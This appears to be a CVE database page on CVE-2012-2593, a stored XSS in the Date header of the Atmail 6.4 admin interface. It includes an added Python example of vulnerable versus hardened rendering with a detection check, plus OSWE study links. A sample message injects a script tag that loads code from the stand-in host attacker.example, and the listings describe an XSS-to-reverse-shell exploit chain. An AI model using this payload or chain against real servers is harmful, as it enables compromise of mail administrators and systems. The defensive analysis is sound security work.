CVE-2012-2593

Published: 06/02/2020 Updated: 10/02/2020
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 6.1 | Impact Score: 2.7 | Exploitability Score: 2.8
VMScore: 437
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

Cross-site scripting (XSS) vulnerability in the administrative interface in Atmail Webmail Server 6.4 allows remote malicious users to inject arbitrary web script or HTML via the Date field of an email.

Vulnerable Products

atmail atmail 6.4.0

Exploits

######################################################################################
# Exploit Title: Atmail Email Server Appliance 6.4 Remote Code Execution
# Date: Jul 21 2012
# Author: muts
# Version: Atmail Email Server 6.4
#
# By sending an email to a user with the Atmail administrative interface open, we
# can call a remote JavaScript file ...
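The defect behind this CVE is a mail header (Date) that is rendered into the administrative message list without being parsed or escaped, so markup placed in it by the sender executes in the administrator's browser. The following is an added Python example, not Atmail's code and not the exploit-db PoC: it builds two constructed messages (the attacker host attacker.example, the script URL and all addresses are placeholders), shows the vulnerable rendering pattern beside a hardened one that re-renders the date from the parsed RFC 5322 value, and adds a gateway-side check that flags Date headers which do not parse or carry markup characters.

```python
import html
from datetime import timezone
from email import message_from_string
from email.utils import parsedate_to_datetime

# Constructed sample messages (not real traffic). The attacker host and the
# script URL are placeholders for illustration only.
HOSTILE_MESSAGE = (
    "From: sender@example.com\r\n"
    "To: admin@example.com\r\n"
    "Subject: hello\r\n"
    'Date: <script src="http://attacker.example/x.js"></script>\r\n'
    "\r\n"
    "body\r\n"
)

BENIGN_MESSAGE = (
    "From: sender@example.com\r\n"
    "To: admin@example.com\r\n"
    "Subject: hello\r\n"
    "Date: Sat, 21 Jul 2012 12:30:00 +0200\r\n"
    "\r\n"
    "body\r\n"
)


def date_cell_vulnerable(raw: str) -> str:
    """Pattern behind the bug: the raw Date header string is dropped into the
    message-list HTML without parsing or escaping, so any markup in it is
    executed by the browser of whoever views the list."""
    msg = message_from_string(raw)
    return '<td class="date">%s</td>' % msg.get("Date", "")


def date_cell_hardened(raw: str) -> str:
    """Parse the header as an RFC 5322 date, render from the parsed value and
    HTML-escape the result. The original header bytes never reach the page."""
    msg = message_from_string(raw)
    header = msg.get("Date", "")
    try:
        dt = parsedate_to_datetime(header)
    except (TypeError, ValueError):
        # Unparseable dates (including injected markup) get a fixed placeholder.
        # Python < 3.10 raises TypeError here, 3.10+ raises ValueError.
        return '<td class="date">(invalid date)</td>'
    if dt.tzinfo is None:  # a "-0000" zone yields a naive datetime; treat as UTC
        dt = dt.replace(tzinfo=timezone.utc)
    text = dt.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M UTC")
    return '<td class="date">%s</td>' % html.escape(text, quote=True)


def date_header_is_suspicious(raw: str) -> bool:
    """Inbound check for a mail gateway or a detection rule: flag messages whose
    Date header does not parse, or contains characters that never appear in a
    legitimate one."""
    header = message_from_string(raw).get("Date", "")
    if any(c in header for c in "<>\"'"):
        return True
    try:
        parsedate_to_datetime(header)
    except (TypeError, ValueError):
        return True
    return False


if __name__ == "__main__":
    print(date_cell_vulnerable(HOSTILE_MESSAGE))   # script tag reaches the page
    print(date_cell_hardened(HOSTILE_MESSAGE))     # (invalid date)
    print(date_cell_hardened(BENIGN_MESSAGE))      # 2012-07-21 10:30 UTC
    print(date_header_is_suspicious(HOSTILE_MESSAGE),
          date_header_is_suspicious(BENIGN_MESSAGE))
```

The hardened renderer deliberately does not try to "clean" the header: it parses, and on failure substitutes a constant. Escaping the raw string would also stop the script from running, but rendering only from the parsed datetime removes the attacker-controlled bytes from the page entirely, which is the property worth testing for in a webmail review. The gateway check is a compensating control, not a fix; the rendering still has to be corrected on the server.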

Github Repositories

AWAE/OSWE Preparation for coming AWAE Training (work in progress)
Atmail Mail Server Appliance: from XSS to RCE (6.4), CVE-2012-2593
  www.exploit-db.com/exploits/20009
  github.com/sourceincite/poc/blob/master/SRC-2016-0012.py
ATutor Authentication Bypass and RCE (2.2.1), CVE-2016-2555
  Install: sourceforge.net/projects/atutor/files/atutor_2_2_1/

Atmail XSS-CSRF-RCE Exploit Chain

Atmail XSS-CSRF-RCE Exploit Chain PoC
  atmail-rce.py: exploits CVE-2012-2593 in Atmail's webmail interface
  atmail-csrf.js: JavaScript file which leverages CVE-2012-2593 into a CSRF to install a malicious plugin which executes a reverse shell
  Plugin.php: Atmail plugin to be installed which calls a reverse shell
!! Only use against servers on which you have permission to test.

OSWE Preparation

https://github.com/timip/OSWE

https://github.com/ManhNho/AWAE-OSWE

AWAE/OSWE Preparation for coming AWAE Training (work in progress)
Facebook discussion group: www.facebook.com/groups/262623168007439
Course syllabus: www.offensive-security.com/documentation/awae-syllabus.pdf
Other resources:
  Burp Suite how-to: portswigger.net/burp/documentation
  Common web vulnerabilities: portswigger.net/web-security
  Atmail Mai

my n00b notes on web_study

Stop what you are doing and have a glance through this: www.infosecmatter.com/bug-bounty-tips/
web_study: my n00b notes on web_study. The Single Page badge on PA doesn't tell you where the exercises are; they are here. A good list of "todo's" is here at mrb3n's blog.
To do:
  Portswigger labs will take you from 0 to hero
  LKWA ^^^ lab guide
  Hack the Box/ B

Do all these topics and learn advanced web hacking as well, to prepare for OSWE.